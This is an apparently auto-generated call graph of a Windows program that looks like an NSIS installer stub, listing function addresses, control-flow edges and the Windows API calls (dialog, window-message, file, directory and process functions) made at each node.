40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038